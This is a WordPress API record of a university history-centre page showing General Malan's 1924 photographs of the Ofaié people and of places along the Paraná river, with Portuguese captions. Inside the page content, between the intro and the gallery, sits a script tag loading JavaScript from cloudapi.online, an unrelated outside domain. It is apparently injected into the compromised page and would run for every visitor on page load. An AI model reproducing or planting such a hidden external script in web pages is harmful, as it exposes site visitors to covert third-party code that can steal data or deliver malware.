{"id":987,"date":"2017-09-02T07:29:27","date_gmt":"2017-09-02T07:29:27","guid":{"rendered":"http:\/\/www.ndh.ufms.br\/?page_id=987"},"modified":"2025-11-04T09:36:11","modified_gmt":"2025-11-04T13:36:11","slug":"general-malan","status":"publish","type":"page","link":"https:\/\/ndh-cptl.ufms.br\/?page_id=987","title":{"rendered":"General Malan  (1924)"},"content":{"rendered":"<p style=\"text-align: justify;\"><span id=\"yiv7004285357yui_3_16_0_1_1504363789128_11554\">As i<\/span><span id=\"yiv7004285357yui_3_16_0_1_1504363789128_11648\">magens Ofai\u00e9 recolhidas por General Malan em 1924, s\u00e3o as fotografias mais antigas que se tem not\u00edcia sobre este povo habitante da margem direita do rio Paran\u00e1<\/span><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n<div id='gallery-1' class='gallery galleryid-987 gallery-columns-3 gallery-size-thumbnail'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=991'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_6-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-991\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-991'>\n\t\t\t\tCaminh\u00e3o varando o Taquaruss\u00fa (1924)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=992'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_07-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-992\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-992'>\n\t\t\t\tEsbo\u00e7o da regi\u00e3o Sul de Matto Grosso (1924)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=993'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_08-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-993\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-993'>\n\t\t\t\tConstru\u00e7\u00e3o da ponte rio Taquaru\u00e7u (1924)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=994'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_09-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-994\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-994'>\n\t\t\t\tPassagem de curso d&#8217;\u00e1gua &#8211; Porto Quinze (1924)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=995'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_10-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-995\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-995'>\n\t\t\t\tInd\u00edgenas Chavantes (Ofai\u00e9) no Porto Quinze (1924)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=998'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_11-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-998\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-998'>\n\t\t\t\tBalsa do rio Verde (1924)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=999'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_12-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-999\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-999'>\n\t\t\t\tInd\u00edgenas Chavantes (Ofai\u00e9) em Porto Quinze (1924)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1000'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_13-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1000\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1000'>\n\t\t\t\tInd\u00edgenas Chavantes (Ofai\u00e9) no Porto Quinze (1924)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1001'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_14-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1001\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1001'>\n\t\t\t\tPassagem de gado, a nado no rio Paran\u00e1 (1924)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1002'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_15-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1002\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1002'>\n\t\t\t\tPorto Quinze (1924)\n\t\t\t\t<\/dd><\/dl>\n\t\t\t<br style='clear: both' \/>\n\t\t<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>As imagens Ofai\u00e9 recolhidas por General Malan em 1924, s\u00e3o as fotografias mais antigas que se tem not\u00edcia sobre este povo habitante da margem direita do rio Paran\u00e1<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":952,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-987","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/987","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=987"}],"version-history":[{"count":7,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/987\/revisions"}],"predecessor-version":[{"id":1307,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/987\/revisions\/1307"}],"up":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/952"}],"wp:attachment":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=987"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}